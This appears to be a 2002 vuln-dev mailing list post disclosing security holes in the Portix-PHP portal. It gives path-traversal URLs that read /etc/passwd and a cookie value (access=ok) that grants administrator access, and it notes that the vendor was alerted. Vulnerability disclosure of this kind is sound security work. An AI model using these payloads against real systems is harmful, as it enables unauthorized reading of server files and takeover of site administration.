Vulnerability Development mailing list archives

Re: Big Security Holes in Portix-PHP Portal

From: "Frog Frog" <leseulfrog () hotmail com>
Date: Thu, 31 Jan 2002 18:28:54 +0100

I made a tutoriel in french :
http://balteam.multimania.com/Tuts/Portix.txt

From: frog frog <leseulfrog () hotmail com>
To: vuln-dev () securityfocus com
Subject: Big Security Holes in Portix-PHP Portal
Date: 31 Jan 2002 16:19:47 -0000

On all version. The last one is 0.4.02 .

To view files in the hard disk :

www.hostportix.com/index.php?l=../../../etc/passwd

www.hostportix.com/index.php?
l=forum/view.php&topic=../../../etc/passwd

To be administrator :
Send the cookie name=access value=ok
to /config/config.php .

Portix team has been alerted.





_________________________________________________________________

Rejoignez le plus grand service de messagerie au monde avec MSN Hotmail.http://www.hotmail.com/fr

Current thread:

Big Security Holes in Portix-PHP Portal frog frog (Jan 31)
- <Possible follow-ups>
- Re: Big Security Holes in Portix-PHP Portal Frog Frog (Jan 31)